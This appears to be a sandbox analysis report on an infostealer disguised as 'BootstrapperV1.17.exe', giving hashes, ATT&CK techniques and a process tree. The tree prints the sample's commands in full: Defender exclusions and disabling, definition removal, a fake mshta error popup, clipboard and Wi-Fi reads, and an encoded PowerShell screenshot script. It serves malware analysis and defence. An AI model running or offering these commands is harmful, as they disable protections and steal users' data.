da44dffb74565d774fc45e372033275886388a8c5d8c1c4bff18faab130825c4

Analysis

max time kernel
91s
max time network
114s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08/08/2024, 20:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperV1.17.exe
Size

6.9MB
MD5

2ff66f4026f95e36b9129005ce1889d5
SHA1

a044dcfa564d37d29ea5cd9ef77aac16ed45c3e7
SHA256

da44dffb74565d774fc45e372033275886388a8c5d8c1c4bff18faab130825c4
SHA512

7fc840a29924fe94fc7399240da98b95bdb12b86b4da51379490d21276416ba3e403fe35de514aba120139ed0e74a49184e114301c9b34de0b28131622c28991
SSDEEP

98304:t8zHqdVfB2FS27wgvCGyuT/9vUIdD9C+z3zO917vOTh+ezDNh7bvmJ1nmOBN9n48:tcQszCGbT/9bvLz3S1bA3zin97b

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2260	powershell.exe
60	powershell.exe
1500	powershell.exe
2756	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3656	cmd.exe
2800	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5092	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe
4976	BootstrapperV1.17.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000236b2-21.dat	upx
behavioral2/memory/4976-25-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp	upx
behavioral2/files/0x00070000000236a5-28.dat	upx
behavioral2/files/0x00070000000236b0-29.dat	upx
behavioral2/files/0x00070000000236ac-48.dat	upx
behavioral2/files/0x00070000000236ab-47.dat	upx
behavioral2/files/0x00070000000236aa-46.dat	upx
behavioral2/files/0x00070000000236a9-43.dat	upx
behavioral2/memory/4976-45-0x00007FFE808D0000-0x00007FFE808DF000-memory.dmp	upx
behavioral2/files/0x00070000000236a8-42.dat	upx
behavioral2/files/0x00070000000236a7-41.dat	upx
behavioral2/files/0x00070000000236a6-40.dat	upx
behavioral2/files/0x00070000000236a4-39.dat	upx
behavioral2/files/0x00070000000236b7-38.dat	upx
behavioral2/files/0x00070000000236b6-37.dat	upx
behavioral2/files/0x00070000000236b5-36.dat	upx
behavioral2/files/0x00070000000236b1-33.dat	upx
behavioral2/files/0x00070000000236af-32.dat	upx
behavioral2/memory/4976-44-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp	upx
behavioral2/memory/4976-54-0x00007FFE7AC20000-0x00007FFE7AC4D000-memory.dmp	upx
behavioral2/memory/4976-56-0x00007FFE7B8E0000-0x00007FFE7B8F9000-memory.dmp	upx
behavioral2/memory/4976-58-0x00007FFE7A750000-0x00007FFE7A773000-memory.dmp	upx
behavioral2/memory/4976-60-0x00007FFE6A5D0000-0x00007FFE6A747000-memory.dmp	upx
behavioral2/memory/4976-63-0x00007FFE7B6F0000-0x00007FFE7B709000-memory.dmp	upx
behavioral2/memory/4976-64-0x00007FFE7A740000-0x00007FFE7A74D000-memory.dmp	upx
behavioral2/memory/4976-66-0x00007FFE7A660000-0x00007FFE7A68E000-memory.dmp	upx
behavioral2/memory/4976-71-0x00007FFE79FA0000-0x00007FFE7A058000-memory.dmp	upx
behavioral2/memory/4976-70-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp	upx
behavioral2/memory/4976-80-0x00007FFE6A130000-0x00007FFE6A24C000-memory.dmp	upx
behavioral2/memory/4976-79-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp	upx
behavioral2/memory/4976-77-0x00007FFE7A630000-0x00007FFE7A63D000-memory.dmp	upx
behavioral2/memory/4976-76-0x00007FFE7A640000-0x00007FFE7A654000-memory.dmp	upx
behavioral2/memory/4976-72-0x00007FFE6A250000-0x00007FFE6A5C8000-memory.dmp	upx
behavioral2/memory/4976-222-0x00007FFE7AC20000-0x00007FFE7AC4D000-memory.dmp	upx
behavioral2/memory/4976-291-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp	upx
behavioral2/memory/4976-306-0x00007FFE7A750000-0x00007FFE7A773000-memory.dmp	upx
behavioral2/memory/4976-302-0x00007FFE6A250000-0x00007FFE6A5C8000-memory.dmp	upx
behavioral2/memory/4976-301-0x00007FFE79FA0000-0x00007FFE7A058000-memory.dmp	upx
behavioral2/memory/4976-300-0x00007FFE7A660000-0x00007FFE7A68E000-memory.dmp	upx
behavioral2/memory/4976-298-0x00007FFE7B6F0000-0x00007FFE7B709000-memory.dmp	upx
behavioral2/memory/4976-297-0x00007FFE6A5D0000-0x00007FFE6A747000-memory.dmp	upx
behavioral2/memory/4976-292-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp	upx
behavioral2/memory/4976-333-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp	upx
behavioral2/memory/4976-339-0x00007FFE7B6F0000-0x00007FFE7B709000-memory.dmp	upx
behavioral2/memory/4976-338-0x00007FFE6A5D0000-0x00007FFE6A747000-memory.dmp	upx
behavioral2/memory/4976-337-0x00007FFE7A750000-0x00007FFE7A773000-memory.dmp	upx
behavioral2/memory/4976-336-0x00007FFE7B8E0000-0x00007FFE7B8F9000-memory.dmp	upx
behavioral2/memory/4976-335-0x00007FFE7AC20000-0x00007FFE7AC4D000-memory.dmp	upx
behavioral2/memory/4976-334-0x00007FFE808D0000-0x00007FFE808DF000-memory.dmp	upx
behavioral2/memory/4976-330-0x00007FFE7A630000-0x00007FFE7A63D000-memory.dmp	upx
behavioral2/memory/4976-329-0x00007FFE7A640000-0x00007FFE7A654000-memory.dmp	upx
behavioral2/memory/4976-328-0x00007FFE6A250000-0x00007FFE6A5C8000-memory.dmp	upx
behavioral2/memory/4976-327-0x00007FFE79FA0000-0x00007FFE7A058000-memory.dmp	upx
behavioral2/memory/4976-326-0x00007FFE7A660000-0x00007FFE7A68E000-memory.dmp	upx
behavioral2/memory/4976-317-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp	upx
behavioral2/memory/4976-332-0x00007FFE7A740000-0x00007FFE7A74D000-memory.dmp	upx
behavioral2/memory/4976-331-0x00007FFE6A130000-0x00007FFE6A24C000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1260	tasklist.exe
988	tasklist.exe
2184	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2900	cmd.exe
2396	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6032	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4784	systeminfo.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
6140	taskkill.exe
5284	taskkill.exe
520	taskkill.exe
3864	taskkill.exe
6048	taskkill.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2260	powershell.exe
2260	powershell.exe
2800	powershell.exe
2800	powershell.exe
4912	powershell.exe
4912	powershell.exe
2756	powershell.exe
2756	powershell.exe
4912	powershell.exe
2800	powershell.exe
2260	powershell.exe
2756	powershell.exe
60	powershell.exe
60	powershell.exe
60	powershell.exe
5656	powershell.exe
5656	powershell.exe
5656	powershell.exe
1500	powershell.exe
1500	powershell.exe
3380	powershell.exe
3380	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1260	tasklist.exe
Token: SeDebugPrivilege	2184	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4340	WMIC.exe
Token: SeSecurityPrivilege	4340	WMIC.exe
Token: SeTakeOwnershipPrivilege	4340	WMIC.exe
Token: SeLoadDriverPrivilege	4340	WMIC.exe
Token: SeSystemProfilePrivilege	4340	WMIC.exe
Token: SeSystemtimePrivilege	4340	WMIC.exe
Token: SeProfSingleProcessPrivilege	4340	WMIC.exe
Token: SeIncBasePriorityPrivilege	4340	WMIC.exe
Token: SeCreatePagefilePrivilege	4340	WMIC.exe
Token: SeBackupPrivilege	4340	WMIC.exe
Token: SeRestorePrivilege	4340	WMIC.exe
Token: SeShutdownPrivilege	4340	WMIC.exe
Token: SeDebugPrivilege	4340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4340	WMIC.exe
Token: SeRemoteShutdownPrivilege	4340	WMIC.exe
Token: SeUndockPrivilege	4340	WMIC.exe
Token: SeManageVolumePrivilege	4340	WMIC.exe
Token: 33	4340	WMIC.exe
Token: 34	4340	WMIC.exe
Token: 35	4340	WMIC.exe
Token: 36	4340	WMIC.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	988	tasklist.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeIncreaseQuotaPrivilege	4340	WMIC.exe
Token: SeSecurityPrivilege	4340	WMIC.exe
Token: SeTakeOwnershipPrivilege	4340	WMIC.exe
Token: SeLoadDriverPrivilege	4340	WMIC.exe
Token: SeSystemProfilePrivilege	4340	WMIC.exe
Token: SeSystemtimePrivilege	4340	WMIC.exe
Token: SeProfSingleProcessPrivilege	4340	WMIC.exe
Token: SeIncBasePriorityPrivilege	4340	WMIC.exe
Token: SeCreatePagefilePrivilege	4340	WMIC.exe
Token: SeBackupPrivilege	4340	WMIC.exe
Token: SeRestorePrivilege	4340	WMIC.exe
Token: SeShutdownPrivilege	4340	WMIC.exe
Token: SeDebugPrivilege	4340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4340	WMIC.exe
Token: SeRemoteShutdownPrivilege	4340	WMIC.exe
Token: SeUndockPrivilege	4340	WMIC.exe
Token: SeManageVolumePrivilege	4340	WMIC.exe
Token: 33	4340	WMIC.exe
Token: 34	4340	WMIC.exe
Token: 35	4340	WMIC.exe
Token: 36	4340	WMIC.exe
Token: SeDebugPrivilege	6048	taskkill.exe
Token: SeDebugPrivilege	6140	taskkill.exe
Token: SeDebugPrivilege	5284	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	60	powershell.exe
Token: SeDebugPrivilege	5656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4532	WMIC.exe
Token: SeSecurityPrivilege	4532	WMIC.exe
Token: SeTakeOwnershipPrivilege	4532	WMIC.exe
Token: SeLoadDriverPrivilege	4532	WMIC.exe
Token: SeSystemProfilePrivilege	4532	WMIC.exe
Token: SeSystemtimePrivilege	4532	WMIC.exe
Token: SeProfSingleProcessPrivilege	4532	WMIC.exe
Token: SeIncBasePriorityPrivilege	4532	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 4976	2640	BootstrapperV1.17.exe	90
PID 2640 wrote to memory of 4976	2640	BootstrapperV1.17.exe	90
PID 4976 wrote to memory of 1776	4976	BootstrapperV1.17.exe	94
PID 4976 wrote to memory of 1776	4976	BootstrapperV1.17.exe	94
PID 4976 wrote to memory of 2448	4976	BootstrapperV1.17.exe	95
PID 4976 wrote to memory of 2448	4976	BootstrapperV1.17.exe	95
PID 4976 wrote to memory of 1652	4976	BootstrapperV1.17.exe	96
PID 4976 wrote to memory of 1652	4976	BootstrapperV1.17.exe	96
PID 4976 wrote to memory of 1900	4976	BootstrapperV1.17.exe	100
PID 4976 wrote to memory of 1900	4976	BootstrapperV1.17.exe	100
PID 4976 wrote to memory of 3952	4976	BootstrapperV1.17.exe	101
PID 4976 wrote to memory of 3952	4976	BootstrapperV1.17.exe	101
PID 4976 wrote to memory of 4000	4976	BootstrapperV1.17.exe	104
PID 4976 wrote to memory of 4000	4976	BootstrapperV1.17.exe	104
PID 4976 wrote to memory of 3656	4976	BootstrapperV1.17.exe	105
PID 4976 wrote to memory of 3656	4976	BootstrapperV1.17.exe	105
PID 4976 wrote to memory of 2652	4976	BootstrapperV1.17.exe	106
PID 4976 wrote to memory of 2652	4976	BootstrapperV1.17.exe	106
PID 4976 wrote to memory of 2900	4976	BootstrapperV1.17.exe	107
PID 4976 wrote to memory of 2900	4976	BootstrapperV1.17.exe	107
PID 4976 wrote to memory of 2024	4976	BootstrapperV1.17.exe	109
PID 4976 wrote to memory of 2024	4976	BootstrapperV1.17.exe	109
PID 4976 wrote to memory of 3472	4976	BootstrapperV1.17.exe	110
PID 4976 wrote to memory of 3472	4976	BootstrapperV1.17.exe	110
PID 4976 wrote to memory of 2848	4976	BootstrapperV1.17.exe	108
PID 4976 wrote to memory of 2848	4976	BootstrapperV1.17.exe	108
PID 1900 wrote to memory of 1260	1900	cmd.exe	118
PID 1900 wrote to memory of 1260	1900	cmd.exe	118
PID 3472 wrote to memory of 4544	3472	cmd.exe	119
PID 3472 wrote to memory of 4544	3472	cmd.exe	119
PID 3952 wrote to memory of 2184	3952	cmd.exe	120
PID 3952 wrote to memory of 2184	3952	cmd.exe	120
PID 1652 wrote to memory of 3760	1652	cmd.exe	121
PID 1652 wrote to memory of 3760	1652	cmd.exe	121
PID 2024 wrote to memory of 4912	2024	cmd.exe	124
PID 2024 wrote to memory of 4912	2024	cmd.exe	124
PID 2652 wrote to memory of 988	2652	cmd.exe	125
PID 2652 wrote to memory of 988	2652	cmd.exe	125
PID 2900 wrote to memory of 2396	2900	cmd.exe	122
PID 2900 wrote to memory of 2396	2900	cmd.exe	122
PID 2848 wrote to memory of 4784	2848	cmd.exe	123
PID 2848 wrote to memory of 4784	2848	cmd.exe	123
PID 2448 wrote to memory of 2260	2448	cmd.exe	126
PID 2448 wrote to memory of 2260	2448	cmd.exe	126
PID 4000 wrote to memory of 4340	4000	cmd.exe	127
PID 4000 wrote to memory of 4340	4000	cmd.exe	127
PID 3656 wrote to memory of 2800	3656	cmd.exe	128
PID 3656 wrote to memory of 2800	3656	cmd.exe	128
PID 4976 wrote to memory of 2908	4976	BootstrapperV1.17.exe	129
PID 4976 wrote to memory of 2908	4976	BootstrapperV1.17.exe	129
PID 1776 wrote to memory of 2756	1776	cmd.exe	131
PID 1776 wrote to memory of 2756	1776	cmd.exe	131
PID 2908 wrote to memory of 5248	2908	cmd.exe	133
PID 2908 wrote to memory of 5248	2908	cmd.exe	133
PID 4976 wrote to memory of 5368	4976	BootstrapperV1.17.exe	134
PID 4976 wrote to memory of 5368	4976	BootstrapperV1.17.exe	134
PID 5368 wrote to memory of 5448	5368	cmd.exe	136
PID 5368 wrote to memory of 5448	5368	cmd.exe	136
PID 4976 wrote to memory of 5504	4976	BootstrapperV1.17.exe	137
PID 4976 wrote to memory of 5504	4976	BootstrapperV1.17.exe	137
PID 4912 wrote to memory of 5564	4912	powershell.exe	139
PID 4912 wrote to memory of 5564	4912	powershell.exe	139
PID 5504 wrote to memory of 5600	5504	cmd.exe	140
PID 5504 wrote to memory of 5600	5504	cmd.exe	140

C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.17.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.17.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.17.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.17.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.17.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.17.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure node.js is downloaded and opened', 0, 'Failed to loadup Bootstrapper', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure node.js is downloaded and opened', 0, 'Failed to loadup Bootstrapper', 0+16);close()"
      4⤵
      PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
